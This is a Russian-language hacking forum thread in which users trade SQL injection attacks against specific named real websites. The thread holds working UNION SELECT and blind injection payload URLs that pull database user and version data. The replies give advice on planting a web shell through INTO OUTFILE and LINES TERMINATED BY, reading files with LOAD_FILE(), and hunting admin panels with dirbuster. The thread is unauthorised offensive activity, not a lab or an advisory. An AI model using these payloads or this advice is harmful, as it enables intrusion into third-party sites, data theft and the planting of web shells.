Такой вопрос, вот собственно скуля http://extrovert.irkutsk.ru/?id=-4+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16-- я немного непойму как работает ето скрипт типа http://extrovert.irkutsk.ru/?id=4 берётся название файла из БД под id = 4 и потом инклудится?? или я нетак понял?? и ещо вопрос, как я могу етим воспользоватся?
ну если ты видишь, что значение из 4 колонки попадает в функцию main, значит это должно делать для тебя какие-то выводы
Есть сайт, нашел на нем Blind Injection Powered-by: PHP/5.2.17 DB Server: MySQL Через Havij получаю доступ к бд, админку не нашел, так же как и логин с паролем, как можно залить в данном случае шелл ?
выбор не велик, всё тот же INTO OUTFILE. можно юзать в тандеме с LINES TERMINATED BY. как вариант можно юзать LOAD_FILE() для поиска других багов. можно ещё натравить какой-нить dirbuster, вкусняшек поискать. в том числе и админку)
Доступ в бд это понятие растяжимое... если например получил пдоступ к талице с юзерами мускула) то посмотри привелегии и читаи пост выше) тоха плохого не посоветует) ну а если привилегий нет) то либо пости в топике о помощи в поиске админки) либо забей на скуль и иди дальше)
Это скуль 1) http://www.pro-tec.com.ua/news/30' 2) http://www.pro-tec.com.ua/lang/0' Помогите пожалуйста
Как правильно составить конструкцию для Blind SQL на этом сайте? http://www.braz.by/?action=catalog_detail_model_view&data%5Bid_make%5D=555&data%5Bid_model%5D=1326 OR id=IF(ASCII(SUBSTRING((SELECT USER()),0,1)>=100,'1','0')--+
там не блайнд. http://www.acsavto.ru/mitsubishi/?page_id=379+union+select+1,2,3,4,5,6,7,version(),9,10,11,12
да и тут тоже. http://www.braz.by/?action=catalog_detail_model_view&data[id_make]=555&data[id_model]=-1326+union+select+version(),2,3,4,5,6,7,8,9,10,11,12--
Подскажите как вывести таблицы из определенной БД в SQL inj например есть БД: db1,db2,db3,db4 и т.д. Мне нужно вывести таблицы только из db3 Когда то видел этот запрос но сейчас не могу найти
